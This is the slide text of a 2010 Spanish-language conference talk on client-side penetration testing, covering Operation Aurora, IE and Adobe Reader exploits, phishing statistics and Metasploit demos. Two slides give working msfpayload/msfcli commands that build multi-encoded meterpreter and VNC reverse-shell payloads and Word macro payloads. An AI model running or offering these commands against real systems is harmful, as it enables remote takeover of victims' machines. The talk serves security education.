1. What Work’s On
Client Side Pentesting
CAMPUS PARTY COLOMBIA 2010
I’m a Pentester I’m a User

2. Leonardo Pigñer
www.base4sec.com
@base4sec

3. iLife
kungfoosion.com
@kfs
lpigner@base4sec.com
www.linkedin.com/in/lpigner

5. ekoparty.org
16-17 Septiembre 2010

6. Agenda
• ¿ Por Qué Client Side ?
• La Operación Aurora
• Distribución y Ataques
• Conclusión

7. ¿ Por Qué Client Side ?

8. DIFERENTES TIPOS DE PENETRATION TESTING
No! Yo tengo Jodanse!
Wardialing un 0-day para Yo entro
es lo mejor! IIS 6.0! caminando
Phone Attacker Network Attacker Social Engineer

9. INTERNET
ATACANTE
Firewall
DMZ
LAN
SMTP WWW
DOMINIO BASE DE
DATOS

10. INTERNET
ATACANTE
Web App FW
IPS
Firewall Reverse Proxy
DMZ IDS
LAN
SMTP WWW
DOMINIO BASE DE
DATOS

11. INTERNET
Firewall DMZ
LAN

15. Agenda
• ¿ Por Qué Client Side ?
• La Operación Aurora
• Distribución y Ataques
• Conclusión

16. La Operación
Aurora

17. 12 de Enero
de 2010
“ataques altamente sofisticados y
dirigidos ... originados desde China”
[2] Google Blog: A new approach to China

18. + 30
[1] Wikipedia: Operation Aurora

19. “Operación Aurora”

20. Google se va de China (?)

21. Google.cn

22. Google.com.ar

23. “illegal
flower
tribute”
[4] Wikipedia: Illegal flower tribute

24. PDF, DOC, XLS, CAD, E-mail
Texas
y el resto...
Taiwan
AR
,R
C AB
[3] Mandiant M-Trends “the advanced persistent threat”

26. 0-day para IE 6-7-8
- 12 de Enero: Anuncio de Google
- 14 de Enero: Exploit en Wepawet
- 14 de Enero: Advisory de Microsoft
- 15 de Enero: PoC de MetaSploit
- 21 de Enero: Microsoft update (fuera de ciclo)
[6] Wepawet exploit
[7] German government warns against using MS Explorer

27. www
DEMO #1 “Aurora”
Mas información en:
KUNGFOOSION: Estalló la CyberGuerra!

28. OSVDB 61697
This module exploits a memory corruption flaw in Internet
Explorer. This flaw was found in the wild and was a key
component of the "Operation Aurora" attacks that lead to
the compromise of a number of high profile companies. The
exploit code is a direct port of the public sample published
to the Wepawet malware analysis site. The technique used
by this module is currently identical to the public sample, as
such, only Internet Explorer 6 can be reliably exploited.
Afecta a:
- Internet Explorer 6
- Internet Explorer 7
- Internet Explorer 8

29. Agenda
• ¿ Por Qué Client Side ?
• La Operación Aurora
• Distribución y Ataques
• Conclusión

30. Distribución y Ataques

36. payload
+
encoding

37. DEMO #2 “Payload + Encoding”
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.162.138 LPORT=443 X > payload_1.exe
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/
shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t
raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/
call4_dword_xor -c 3 -t exe -o payload_2.exe
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/
reverse_tcp LHOST=192.168.162.138 LPORT=443 E

38. Tienes un E-Mail

41. CASO de ESTUDIO (?)

43. 25000 mails
1883 interesados

44. Browsers

45. Sistema
Operativo

46. Soporte de Java

47. Versiones
de Flash

48. Abre mi
adjunto!
Tienes un E-Mail

51. Archivos Mas Utilizados
3%
38%
47%
7%
4%
DOC XLS PPT
PDF otros

52. 2008
1968
2009
2195
2010
895
[8] PDF Based Target Attacks are Increasing

53. DEMO #3 “PDF Exploit”
Mas información en:
KUNGFOOSION: Explotando el 0-day de Adobe
Reader

54. OSVDB 61697
This module exploits a buffer overflow in Adobe Reader
and Adobe Acrobat Professional < 8.1.3. By creating a
specially crafted pdf that a contains malformed util.printf()
entry, an attacker may be able to execute arbitrary code.
Afecta a:
- Adobe Reader 8.1.2

55. +EXE
DEMO #4 “PDF + EXE”
Mas información en:
KUNGFOOSION: Embebiendo un Ejecutable dentro
de un PDF con MetaSploit

56. + EXE

57. 2008
1968
2009
2195
2010
895
[8] PDF Based Target Attacks are Increasing

58. DEMO #5 “Word”

59. DEMO #5 “Word”
./msfpayload windows/vncinject/reverse_tcp
LHOST=192.168.162.138 LPORT=443 V >
macro_word.bas
./msfcli exploit/multi/handler PAYLOAD=windows/
vncinject/reverse_tcp LHOST=192.168.162.138
LPORT=443 E

61. La Recepcionista

62. DEMO #6 “USB U3”
Mas información en:
KUNGFOOSION: Ataque USB U3 con MetaSploit

63. SET
social engineering toolkit
“The Java Applet Attack”
Mas información en:
KUNGFOOSION: Ingeniería Social con Applets
firmados de Java en MetaSploit

64. Gracias!
kungfoosion.com
@kfs
lpigner@base4sec.com
www.linkedin.com/in/lpigner